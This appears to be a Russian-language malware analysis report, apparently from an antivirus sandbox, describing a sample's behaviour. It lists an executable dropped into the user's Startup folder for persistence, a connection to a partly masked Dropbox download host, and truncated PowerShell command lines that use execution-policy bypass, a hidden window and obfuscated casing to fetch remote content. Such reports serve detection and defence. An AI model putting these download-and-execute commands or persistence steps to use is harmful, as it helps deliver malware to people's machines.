Техническая информация
- Файл в папке автозагрузки пользователя (запускается при входе в систему): %APPDATA%\microsoft\windows\start menu\programs\startup\adhlpquq12.exe
- '%APPDATA%\microsoft\windows\start menu\programs\startup\adhlpquq12.exe'
- Подключение к узлу 'dl.#####oxusercontent.com':443
- DNS-запрос (DNS ASK): dl.#####oxusercontent.com
- '<SYSTEM32>\cmd.exe' /c poWeRsheLl -ExEcuTiOnPOlicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c poWeRsheLl -ExEcuTiOnPOlicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcuTiOnPOlicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://dl.dropb...